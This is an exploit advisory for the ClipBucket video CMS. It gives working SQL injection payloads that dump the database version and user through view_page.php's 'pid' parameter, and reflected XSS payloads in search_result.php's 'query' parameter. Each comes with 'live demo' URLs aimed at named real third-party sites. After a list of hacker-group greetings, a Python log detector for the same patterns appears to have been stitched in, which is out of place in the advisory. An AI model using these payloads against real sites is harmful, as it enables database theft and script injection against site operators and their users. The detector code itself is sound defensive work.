ClipBucket script SQL Injection and XSS

2013.07.07
Credit: IndiShell
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79, CWE-98

# Exploit Title : SQL Injection and XSS vulnerability in ClipBucket script
# Date : 01 July 2013
# Exploit Author : 3rr0r1046 IndiShell
# Vendor Homepage : http://clip-bucket.com/
# Category : webapps
# Tested on : Linux
# Dork : "Forged by ClipBucket"

//////////////////// DESCRIPTION ////////////////////

ClipBucket is a video and photo hosting CMS in which users can upload videos and photos. This CMS has an SQL injection vulnerability in the 'pid' parameter of the view_page.php script, through which an attacker can gain information from the database by executing arbitrary SQL commands. An XSS flaw also exists in search_result.php, in the 'query' parameter.

////////////////// POC SQL Injection //////////////////

Dumping SQL version and user:

http://127.0.0.1/view_page.php?pid=-3' union select 1,2,3,4,5,group_concat(version(),0x3e,user()),7,8,9,10--+

Live demo:

1. http://insXafpk.tv/view_page.php?pid=-3' union select 1,2,3,4,5,group_concat(version(),0x3e,user()),7,8,9,10--+
2. http://vid4X8.com/view_page.php?pid=-3' union select 1,2,3,4,5,group_concat(version(),0x3e,user()),7,8,9,10--+
3. http://koolXspan.com/clip/view_page.php?pid=-3' union select 1,2,3,4,5,group_concat(version(),0x3e,user()),7,8,9,10 --+
4. http://X.agro.uba.ar/view_page.php?pid=-3' union select 1,2,3,4,5,group_concat(version(),0x3e,user()),7,8,9,10--+

//////////////// POC XSS ////////////////

Sample XSS attack URL:

http://127.0.0.1/search_result.php?query='"--><%2Fstyle><%2Fscript><script>alert('XSS')<%2Fscript>&type=videos&submit=Search

Live demo:

1. http://insafpk.tv/search_result.php?query='"--><%2Fstyle><%2Fscript><script>alert('XSS')<%2Fscript>&type=videos&submit=Search
2. http://comunicacionenvideos.agro.uba.ar/search_result.php?query='"--><%2Fstyle><%2Fscript><script>alert('XSS')<%2Fscript>&type=videos&submit=Search
3. http://vid48.com/search_result.php?query='"--><%2Fstyle><%2Fscript><script>alert('XSS')<%2Fscript>&type=videos&submit=Search
4. http://koolspan.com/clip/search_result.php?query='"--><%2Fstyle><%2Fscript><script>alert('XSS')<%2Fscript>&type=videos&submit=Search

--==[[ Greetz To ]]==--
##########
Guru ji zero, code breaker ica, root_devil, google_warrior, INX_r0ot, Darkwolf indishell, Baba, Silent poison India, Magnum sniper, Atul Dwivedi, ethicalnoob Indishell, Local root indishell, Irfninja indishell, cool toad, cool shavik
Ebin V Thomas, Dinelson Amine, Th3 D3str0yer, SKSking, Mr. Trojan, rad paul, Godzila, mike waals, zoozoo, cyber warrior, Neo hacker ICA, Golden boy INDIA, Ketan Singh, Yash, Reborn India, Alicks, Aneesh Dogra, lovetherisk
Suriya Prakash, cyber gladiator, Cyber Ace, hero, Minhal Mehdi, Raj bhai ji, cold fire hacker, Mannu, ViKi, Budhaoo, Bhuppi, Mohit, Ffe ^_^, Ashish, Shardhanand, silent hacker and rest of TEAM INDISHELL
##########
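The two request patterns above are easy to spot in web-server access logs. The following detector is an added example (not part of the advisory and not ClipBucket code) that flags a non-numeric 'pid' on view_page.php, escalating to an injection finding when a UNION SELECT is present, and a 'query' on search_result.php that carries script or style tags; the log lines, hosts and IPs are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed sample lines in common log format (hosts and IPs are made up).
SAMPLE_LOG = """\
10.0.0.5 - - [07/Jul/2013:10:01:02 +0000] "GET /view_page.php?pid=3 HTTP/1.1" 200 5120
10.0.0.9 - - [07/Jul/2013:10:01:07 +0000] "GET /view_page.php?pid=-3'%20union%20select%201,2,3,4,5,group_concat(version(),0x3e,user()),7,8,9,10--+ HTTP/1.1" 200 6210
10.0.0.9 - - [07/Jul/2013:10:01:15 +0000] "GET /search_result.php?query=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert(%27XSS%27)%3C%2Fscript%3E&type=videos&submit=Search HTTP/1.1" 200 4100
10.0.0.7 - - [07/Jul/2013:10:02:00 +0000] "GET /search_result.php?query=cats&type=videos&submit=Search HTTP/1.1" 200 4000
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
SQLI_RE = re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE)
XSS_RE = re.compile(r"<\s*/?\s*(script|style)\b|on\w+\s*=", re.IGNORECASE)


def classify(line):
    """Return the findings for one access-log line; [] means it looks benign."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    params = parse_qs(parts.query, keep_blank_values=True)  # decodes %xx and '+'
    findings = []
    if parts.path.endswith("/view_page.php"):
        for pid in params.get("pid", []):
            # view_page.php expects a numeric page id; anything else is an anomaly,
            # and a UNION SELECT inside it is a near-certain injection attempt.
            if not pid.isdigit():
                decoded = unquote_plus(pid)  # second pass catches double-encoding
                kind = "sqli" if SQLI_RE.search(decoded) else "anomaly"
                findings.append(f"{kind}:view_page.php?pid")
    if parts.path.endswith("/search_result.php"):
        for q in params.get("query", []):
            if XSS_RE.search(unquote_plus(q)):
                findings.append("xss:search_result.php?query")
    return findings


def scan(log_text):
    """Map 1-based line numbers to findings; benign lines are left out."""
    hits = {}
    for number, raw in enumerate(log_text.splitlines(), 1):
        found = classify(raw)
        if found:
            hits[number] = found
    return hits


if __name__ == "__main__":
    for number, found in scan(SAMPLE_LOG).items():
        print(f"line {number}: {', '.join(found)}")
```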

References:

http://clip-bucket.com/